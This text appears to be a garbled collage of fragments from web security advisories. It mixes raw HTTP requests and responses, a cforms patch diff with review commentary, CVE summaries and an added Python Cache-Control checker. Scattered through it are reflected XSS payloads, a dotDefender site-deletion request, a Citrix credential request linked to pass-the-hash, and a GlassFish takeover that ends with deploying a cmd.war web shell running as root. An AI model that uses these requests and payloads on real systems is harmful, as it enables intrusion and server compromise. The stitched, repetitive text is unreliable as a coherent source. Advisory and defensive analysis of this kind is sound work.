Cache/Control
2. POST /index.php?checknum=758474843719&msg=baseapp HTTP/1.1
>>>>>>> HTTP/1.1 200 OK
Date: Mon, 27 Aug 2007 18:58:21 GMT
Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=10, max=10
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/xml
Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y731553141
Content-Length: 21755
User-Agent: ImageShack Toolbar 4.5.7 ([..])
Host: load9.imageshack.us
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: imgshck=[..]; un_cookie=1; latest=img404; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="toolbar"
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66
username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
--- cforms-v11.5/lib_ajax.php 2009-09-18 10:29:06.000000000 +0900
+++ cforms-v11.6.1/lib_ajax.php 2010-09-22 07:41:54.000000000 +0900
@@ -627,16 +627,16 @@
### always modified
header ("Cache-Control: no-cache, must-revalidate"); ### HTTP/1.1
header ("Pragma: no-cache"); ### HTTP/1.0
- $func_name = $_GET["rs"];
+ $func_name = sajax_sanitize( $_GET["rs"] );
if (! empty($_GET["rsargs"]))
- $args = $_GET["rsargs"];
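Review bot: wrapping `$_GET["rs"]` in `sajax_sanitize()` at the `$func_name` assignment is the wrong shape of fix for a value that selects which PHP function gets called; the name should be checked against the list of functions the page actually exported to sajax, and the request rejected when it is not one of them, with sanitising at most a secondary step. The hunk is also cut off after `- $args = $_GET["rsargs"];`, so what replaces the `rsargs` assignment is not visible here; that branch handles an array (`if (! empty($_GET["rsargs"]))`), so each element needs the same treatment, not the array as a whole. The reflected payload shown elsewhere on this page carries `<script>` in both `rs` and `rsargs[]`, which is why both inputs matter.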
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://172.16.159.132/dotDefender/index.cgi
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14
Connection: keep-alive
Referer: https://{IP}/CACHE/sdesktop/install/start.htm
Content-Type: application/xml; charset=UTF-8
Cookie: webvpnLang=en-us; webvpnlogin=1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 56
Starting, please wait..."><script>alert(1);</script>
RESPONSE:
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Connection: keep-alive
> Referer: https://172.16.159.132/dotDefender/index.cgi
> Authorization: Basic YWRtaW46
> Cache-Control: max-age=0
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 76
>
> sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14
>
> So what has he "fixed"? See the following diff:
>
> --- cforms-v11.5/lib_ajax.php 2009-09-18 10:29:06.000000000
> +0900 +++ cforms-v11.6.1/lib_ajax.php 2010-09-22
> 07:41:54.000000000 +0900 @@ -627,16 +627,16 @@ ### always
> modified header ("Cache-Control: no-cache, must-revalidate"); ###
> HTTP/1.1 header ("Pragma: no-cache"); ###
> HTTP/1.0 - $func_name = $_GET["rs"]; +
> $func_name = sajax_sanitize( $_GET["rs"] ); if (!
> empty($_GET["rsargs"])) - $args =
> $_GET["rsargs"]; + $args =
COMPLETE HTTP RESPONSE:
HTTP/1.1 302 Moved
location: /dana-na/auth//welcome.cgi?p=&hideremed=1
Pragma: no-cache
Cache-Control: no-store
Expires: -1
Transfer-Encoding: chunked
Status: 500 Internal Error
Content-Type: text/html
Content-Type: application/x-www-form-urlencoded
Date: Thu, 01 Dec 2011 16:42:17 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.2
Set-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly
Expires: Thu, 01 Dec 2011 16:42:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 01 Dec 2011 16:42:17 GMT
Set-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly
X-Frame-Options: SAMEORIGIN
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net
Pragma: no-cache
[ Reference ]
[1] "Divide and Conquer: HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics", Amit Klein, March 2004.
http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
"
HTTP/1.0 200 \r
Date: xxx, xx xxx xxxx xx:xx:xx GMT\r
Pragma: no-cache\r
Cache-Control: no-cache\r
\r
%VALUES%
\0\0\0
\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0
Date: Tue, 20 Oct 2009 09:01:58 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.3 with Suhosin-Patch
mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-2ubuntu4.3
Pragma: private
Cache-control: private, must-revalidate
Content-Disposition: attachment; filename=cubecartlatest_20Oct09.sql
Content-length: 80864
Content-Transfer-Encoding: binary
Content-Type: application/octet-stream
Anti-Phishing solution.
References
[1] "HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" by Amit Klein,
http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
Insecure Flash crossdomain.xml
Insecure Silverlight clientaccesspolicy.xml
Charset declarations which could introduce vulnerability (non-UTF-8)
User-controllable charset declarations
Dangerous context-switching between HTTP and HTTPS
Insufficient use of cache-control headers when private data is concerned (e.g. no-store)
Potential HTTP referer leaks of sensitive user-information
Potential information leaks in URL parameters
Source code comments worth a closer look
Hidden debugging messages from Web and Database servers
identifies the following problems:
CVE-2009-3305
A malicious remote server could cause polipo to crash by sending an invalid Cache-Control header.
CVE-2009-4143
A malicious client could cause polipo to crash by sending a large Content-Length value.
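The ratproxy checklist above flags responses that carry private data without `no-store`, and the polipo entries describe a proxy crashing on a malformed Cache-Control header. The following is an added example written for this page, not code from ratproxy, polipo or any advisory quoted here: a Cache-Control parser that tolerates malformed input, plus a checker that applies the no-store rule to raw response header blocks. The sample blocks are constructed from responses shown elsewhere on this page (the phpMyAdmin setup page, the CubeCart database dump, the RSA SecurID login page); the private-data heuristic (a Set-Cookie line or an attachment) and the finding texts are my own assumptions, not anything the advisories state.

```python
# Added example for this page, not code from ratproxy, polipo or any advisory
# quoted here. Sample header blocks are constructed from responses shown on
# the page; the private-data heuristic and finding texts are assumptions.
import re

TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")       # RFC 7230 tchar+
DELTA_SECONDS = {"max-age", "s-maxage", "max-stale", "min-fresh"}


def parse_cache_control(value):
    """Return {directive: argument-or-None} for one Cache-Control value.

    Malformed items (empty entries, a bare '=', unterminated quotes, a
    non-numeric max-age) are dropped or normalised instead of raising, so a
    proxy or scanner built on this cannot be crashed by a hostile header.
    """
    directives = {}
    if not isinstance(value, str):
        return directives
    for item in value.split(","):
        name, has_arg, arg = item.strip().partition("=")
        name = name.strip().lower()
        if not TOKEN.fullmatch(name):
            continue                       # not an HTTP token: ignore the item
        arg = arg.strip() if has_arg else None
        if arg and len(arg) >= 2 and arg[0] == arg[-1] == '"':
            arg = arg[1:-1]                # quoted-string argument
        if name in DELTA_SECONDS and not (arg or "").isdigit():
            arg = None                     # "max-age=abc" carries no usable age
        directives[name] = arg
    return directives


def parse_headers(block):
    """Split a raw response header block into ordered (name, value) pairs.

    Names are lower-cased, duplicates are kept (two Set-Cookie lines, two
    Content-Type lines, as in responses on this page), and the status line or
    any line without ':' is skipped rather than treated as an error.
    """
    pairs = []
    for line in block.splitlines():
        name, colon, value = line.partition(":")
        if colon and not line.startswith("HTTP/"):
            pairs.append((name.strip().lower(), value.strip()))
    return pairs


def carries_private_data(pairs):
    """Assumed heuristic: a response that sets a cookie or serves an attachment
    (the CubeCart SQL dump on this page) carries private data."""
    for name, value in pairs:
        if name == "set-cookie":
            return True
        if name == "content-disposition" and value.lower().startswith("attachment"):
            return True
    return False


def cache_findings(block, private=None):
    """Return the cache-control problems for one response, as strings.

    The distinction that matters is that "no-cache" still lets a cache store
    the response and merely forces revalidation; only "no-store" keeps it off
    disk, which is what the "e.g. no-store" in the ratproxy item points at.
    """
    pairs = parse_headers(block)
    if private is None:
        private = carries_private_data(pairs)
    if not private:
        return []
    cc = {}
    for name, value in pairs:
        if name == "cache-control":
            cc.update(parse_cache_control(value))
    if "no-store" in cc:
        return []
    findings = ["no-store missing on a response carrying private data"]
    if "no-cache" in cc:
        findings.append("no-cache alone allows storage; it only forces revalidation")
    age = cc.get("max-age")                # digits-only or None after parsing
    if "public" in cc or (age is not None and age.lstrip("0") and "private" not in cc):
        findings.append("response is fresh-cacheable by shared caches")
    if not cc and any(n == "pragma" and v.lower() == "no-cache" for n, v in pairs):
        findings.append("only Pragma: no-cache present; HTTP/1.1 caches may ignore it")
    return findings


# Constructed from the phpMyAdmin setup response on this page: correct.
PHPMYADMIN = """HTTP/1.1 200 OK
Set-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Pragma: no-cache
"""

# Constructed from the CubeCart dump download on this page: a whole SQL dump
# served as an attachment with "private" but without "no-store".
CUBECART = """HTTP/1.1 200 OK
Pragma: private
Cache-control: private, must-revalidate
Content-Disposition: attachment; filename=cubecartlatest_20Oct09.sql
Content-Type: application/octet-stream
"""

# Constructed from the RSA SecurID login response on this page; the caller
# declares it private because it is an authentication page.
SECURID = """HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache,max-age=0,must-revalidate
Content-Type: text/html
"""

if __name__ == "__main__":
    for label, block, private in (("phpMyAdmin", PHPMYADMIN, None),
                                  ("CubeCart", CUBECART, None),
                                  ("SecurID", SECURID, True)):
        print(label, cache_findings(block, private) or ["ok"])
```

Run stand-alone it reports the phpMyAdmin block as clean, the CubeCart dump as missing `no-store`, and the SecurID page as both missing `no-store` and relying on `no-cache`, which a browser that honours the directive will still write to its disk cache. The parser deliberately throws away anything that is not a token or a numeric delta-seconds value instead of raising, which is the behaviour a forward proxy needs when a remote server sends it garbage.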
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://host/path
Content-Length: 80
Cookie: PHPSESSID=<my_phpsessid>; eXtplorer=<my_cookie>
Pragma: no-cache
Cache-Control: no-cache
start=0&limit=50&dir=x&option=com_extplorer&action=getdircontents&sendWhat=files
The response is a JSON file:
{"action":"","message":"\/var\/www\/path\/\/x : This directory
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-control: no-cache,max-age=0,must-revalidate
<HTML>
<HEAD>
~ <TITLE>RSA SecurID : Log In</TITLE>
Content-Type: application/x-www-form-urlencoded
User-Agent: C:\PROGRA~1\Citrix\ICACLI~1\PNAMain.exe
Host: xxx.xxx.xxx.xxx
Content-Length: 705
Connection: Keep-Alive
Cache-Control: no-cache
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE NFuseProtocol SYSTEM "NFuse.dtd"><NFuseProtocol version="4.6"><RequestAppData><Scope traverse="onelevel" type="PNFolder">$PRELAUNCH$</Scope><DesiredDetails>permissions</DesiredDetails><DesiredDetails>icon-info</DesiredDetails><DesiredDetails>all</DesiredDetails><ServerType>x</ServerType><ServerType>win32</ServerType><ClientType>ica30</ClientType><ClientType>content</ClientType><Credentials><UserName>domain\myuser</UserName><Password encoding="ctx1">ENCODEDPASSWORDHERE</Password><Domain type="NT"></Domain></Credentials><ClientName>COMPUTER01</ClientName><ClientAddress>xxx.xxx.xxx.xxx</ClientAddress></RequestAppData></NFuseProtocol>
More information on how it works:
http://eelsivart.blogspot.com/2011/12/citrix-receiver-xendesktop-pass-hash.html
Connection: keep-alive
Cookie: sessionid=[...]; cadata="[...]"
And we get a redirection to the website defined:
HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 277
Content-Type: text/html
Expires: Fri, 28 Mar 2008 08:53:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/x-gwt-rpc; charset=utf-8
User-Agent: GoogleBot/2.1
Host: 192.168.0.1:8014
Content-Length: 149
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: donotshowgettingstarted=%7B%22state%22%3Atrue%7D
5|0|4|http://192.168.0.1:8014/contents/|2C6B33BED38F825C48AE73C093241510|com.ca.arcflash.ui.client.homepage.HomepageService|getLocalHost|1|2|3|4|0|
Note that '2C6B33BED38F825C48AE73C093241510' is a static value
Content-Length: 361
Date: Fri, 05 Feb 2010 08:53:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
[REQUEST]
POST /joomla163/index.php HTTP/1.1
Referer: http://attacker.in/joomla163/
User-Agent: Konqueror/4.5
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: attacker.in
Accept-Encoding: gzip, deflate
Content-Length: 125
> Connection: keep-alive
> Cookie: sessionid=[...]; cadata="[...]"
>
> And we get a redirection to the website defined:
> HTTP/1.1 200 OK
> Cache-Control: No-cache
> Content-Length: 277
> Content-Type: text/html
> Expires: Fri, 28 Mar 2008 08:53:11 GMT
> Server: Microsoft-IIS/6.0
> X-Powered-By: ASP.NET
Wladimir Palant discovered that Firefox did not restrict access to cookies in
HTTP response headers. If a user were tricked into opening a malicious web
page, a remote attacker could view sensitive information. (CVE-2009-0357)
Paul Nel discovered that Firefox did not honor certain Cache-Control HTTP
directives. A local attacker could exploit this to view private data in
improperly cached pages of another user. (CVE-2009-0358)
Updated packages for Ubuntu 8.04 LTS:
%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;
comment_author_93f41ba0b16f34676f802058e82388f6=test; comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam%40checkpoint.com
Pragma: no-cache
Cache-Control: no-cache
rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#$<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http://www.checkpoint.com$#$<script>alert(1)</script>
http_request += "Content-Type: application/ipp\r\n"
http_request += "User-Agent: Internet Print Provider\r\n"
http_request += "Host: %s\r\n" % self.host
http_request += "Content-Length: %d\r\n" % len(self.ipp_data)
http_request += "Connection: Keep-Alive\r\n"
http_request += "Cache-Control: no-cache\r\n"
return http_request
def get_ipp_request(self):
operation_attr = self.attribute(0x47, 'attributes-charset',
'utf-8')
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.65.78.211:4848/common/security/realms/manageUserNew.jsf?name=admin-realm&configName=server-config&
Content-Length: 0
Cookie: JSESSIONID=ada23501f36f1ec9148589e9a574
Pragma: no-cache
Cache-Control: no-cache
This created a user called NGSSecure with a password of Password!!
NGS then logged on to the Glassfish administration console using this newly created user. Once logged on as this user it was possible to upload and deploy a website, NGS deployed cmd.war which allowed the user to run commands under the context of the GlassFish server which is root by default.